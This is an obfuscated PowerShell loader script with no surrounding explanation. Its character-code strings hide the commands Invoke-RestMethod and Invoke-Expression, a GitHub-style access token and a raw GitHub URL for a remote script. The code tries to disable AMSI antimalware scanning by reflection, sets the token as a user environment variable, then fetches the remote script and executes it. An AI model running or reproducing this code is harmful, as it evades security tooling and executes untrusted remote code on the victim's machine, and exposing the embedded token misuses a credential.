
 $s1 = (-join ((105,110,118,111,107,101,45,101,120,112,114,101,115,115,105,111,110) | % {[char]$_}))
 $s2 = (-join ((105,110,118,111,107,101,45,114,101,115,116,109,101,116,104,111,100) | % {[char]$_}))
 $s3 = (-join ((103,104,112,95,84,68,51,121,53,73,98,48,113,67,118,69,50,121,48,52,79,80,121,50,54,79,54,107,115,83,71,86,113,86,50,73,72,90,75,52) | % {[char]$_}))
 $s5 = 'User'


 $s4 = (-join ((104,116,116,112,115,58,47,47,114,97,119,46,103,105,116,104,117,98,117,115,101,114,99,111,110,116,101,110,116,46,99,111,109,47,103,104,111,115,116,45,109,118,116,47,88,85,90,47,109,97,105,110,47,109,97,105,110,46,112,115,49) | % {[char]$_}))


 $amsi = [Ref].Assembly.GetType((('S'+'y'+'stem.Management.Automation.A'+'msi'+'U'+'tils')))
 $patch = $amsi.GetMethod((('A'+'msi'+'S'+'can'+'Buffer')), [Reflection.BindingFlags]'NonPublic,Static')
 $handle = [IntPtr]::Zero
 $null = [Runtime.InteropServices.Marshal]::WriteInt32($handle, 0xB8, 0)
 $patch.Invoke($null, @($handle, [UInt32]0, $handle, [UInt32]0))

#
[System.Environment]::SetEnvironmentVariable(('GH_TOKEN'), $s3, $s5)


 $exec = (Get-Command $s2).Name
 $eval = (Get-Command $s1).Name
 $payload = & $exec -Uri $s4 -Method Get
& $eval $payload
